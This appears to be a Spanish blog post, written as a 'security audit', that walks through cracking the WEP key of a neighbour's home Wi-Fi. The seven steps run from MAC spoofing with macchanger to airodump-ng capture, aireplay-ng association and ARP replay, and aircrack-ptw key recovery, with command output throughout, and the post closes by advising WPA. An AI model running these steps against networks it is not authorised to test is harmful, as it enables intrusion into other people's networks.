Archivo de la etiqueta: WEP

Auditando contraseñas WEP en 7 pasos.

Pues aquí me tienen, una vez que encontré una antena que me funcionara y al ver que había varias redes disponibles no me pude aguantar las ganas de auditar las contraseñas WEP que encontré a mi alrededor.

Hago la aclaración de que esta es una auditoría de seguridad pero les puedo adelantar la conclusión: La configuración por defecto de los accesos inalámbricos de Infinitum es altamente insegura.

Material necesario.

  • Tarjeta de red inalámbrica, en mi caso use la que siempre me ha acompañado en este blog, la multimencionada ENUWI-G2.
  • Una antena, esta es opcional, pero se puede utilizar para mejorar la calidad del enlace, puede ser la EZ-12 o la del escurridor de aluminio que a mi me ha funcionado muy bien.
  • Una distribución de Linux, utilicé wifiway porque fue la que mejor me reconoció mi tarjeta de red inalámbrica, pero existen otras opciones como Wifislax o Bactrack .

Los pasos a seguir.

Hago la aclaración que esta serie de pasos es para wifiway, pero supongo que se pueden aplicar a las otras distros antes mencionadas. También modifique los datos reales, para proteger la identidad de los personajes (siempre quisé escribir eso 😛 ).

Todos estos pasos se ejecutan desde una terminal (terminalofóbicos abstenganse 😉 )

1.- Verificar si se reconoce la tarjeta de red inalámbrica.

iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

Warning: Driver for device wlan0 has been compiled with version 22
of Wireless Extension, while this program supports up to version 20.
Some things may be broken...

wlan0     802.11b/g  Mode:Monitor  Channel=1  Bit Rate=11 Mb/s
          Tx-Power=11 dBm
          Retry:on   Fragment thr:off
          Link Quality=84/100  Signal level=-236 dBm  Noise level=-240 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Como pueden ver si la reconoció, la tarjeta es la wlan0, aunque me lanza una advertencia de que algo puede andar mal, y en efecto, la luz led de la tarjeta no prende, pero eso no evitó que funcionara para este experimento.

2.- Cambio de la mac address.

macchanger -m 00:11:22:33:44:56 wlan0
Current MAC: 00:11:22:33:44:55 (Cimsys Inc)
Faked MAC:   00:11:22:33:44:56 (Cimsys Inc)

Este paso lo realizo para no tener que acordarme de mi Mac Addres 🙂

3.- Búsqueda de las redes inalámbricas en los alrededores.

airodump-ng wlan0
 CH 13 ][ Elapsed: 2 mins ][ 2008-03-16 11:23

 BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:00:00:00:00:01    2        4        0    0   6  22. WEP  WEP         2WIRE000
 11:11:11:11:11:11   15       53        0    0   1  54. WEP  WEP         INFINITUM0000
 00:00:00:00:00:02    5       34        0    0   6  54. OPN              linksys


En estos resultados vamos a tomar nota de varios datos importantes.

Como pueden ver la red que tiene una mejor calidad de señal es la INFINITUM0000 ya que el valor de PWR myor que el de los demás.

De ahí tomamos el BSSID (11:11:11:11:11:11), el canal en que esta operando (Canal 1) y el ESSID (INFINITUM0000), elegimos esta red porque tiene a mejor calidad de enlace y un método de protección (WEP) muy pobre.

4.- Iniciar la captura.

Iniciando la captura

airodump-ng -w captura -c 1 wlan0

captura es el nombre del archivo que va a recibir la información que vamos a recolectar. Noten también que -c 1 indica que vamos a trabajar en el canal 1.

Es importante que no cerremos esta ventana, de lo contrario lo siguiente que hagamos no servirà de nada. Los siguientes pasos se hacen en una nueva terminal.

5.- Asociar la red inalámbrica.

aireplay-ng -1 0 -e INFINITUM0000 -a 11:11:11:11:11:11 -h 00:11:22:33:44:56 wlan0
11:26:36  Waiting for beacon frame (BSSID: 11:11:11:11:11:11)
11:26:36  Sending Authentication Request
11:26:36  Authentication successful
11:26:36  Sending Association Request
11:26:36  Association successful :-)

Sí aparece el mensaje de Association successful 🙂 estamos listos para continuar. Al principio batallé con este paso, si tienen algún problema es casi seguro que se trata de una mala calidad de señal, pueden estar muy lejos del punto de acceso inalámbrico.

6.- Iniciar la captura de paquetes.

aireplay-ng -3 -b 11:11:11:11:11:11 -h 00:11:22:33:44:56 wlan0
Saving ARP requests in replay_arp-0316-112829.cap
You should also start airodump-ng to capture replies.
Read 598 packets (got 214 ARP requests), sent 1172 packets...(78 pps)

En este punto hay que estar al pendientes, cuando se logren más de 100,000 ARP’s terminamos el proceso (presionando Ctrl+C). Se puede tardar de 10 minutos a media hora dependiendo de la calidad del enlace.

7.- Buscar el archivo .cap con mayor tamaño y encontrar la contraseña.

Llave encontrada

Se acuerdan que en el paso 4 establecimos el nombre del archivo como captura (de hecho puede ser cualquier nombre), bueno pues es normal que en ocasiones se guarde más de un archivo, se distinguen porque les sigue un número, el que debemos de elegir es el que tiene mayor tamaño. Que aquí fue el archivo número 2.

aircrack-ptw captura-02.cap
This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
allocating a new table
bssid = 11:11:11:11:11:11  keyindex=0
stats for bssid 11:11:11:11:11:11  keyindex=0 packets=159646
Found key with len 05: 01 23 34 56 78

Y si todo salio bien en menos de 10 segundos obtendremos la contraseña, si en 10 segundos o menos, todo depende de la potencia de nuestro equipo.

Conclusiones.

Con eso es más que suficiente para encontrar la contraseña WEP de un enlace inalámbrico, lamentablemente este tipo de protección es el más utilizado por los Infinitum de Telmex por eso es poco recomendable dejar estos aparatos con su configuración de fábrica, lo mejor es ajustarla a otro tipo de protección como WPA, desconozco si lo 2wire lo permiten pero los linksys permiten restringir el acceso a ciertas Mac address lo que protege aún más una red inalámbrica.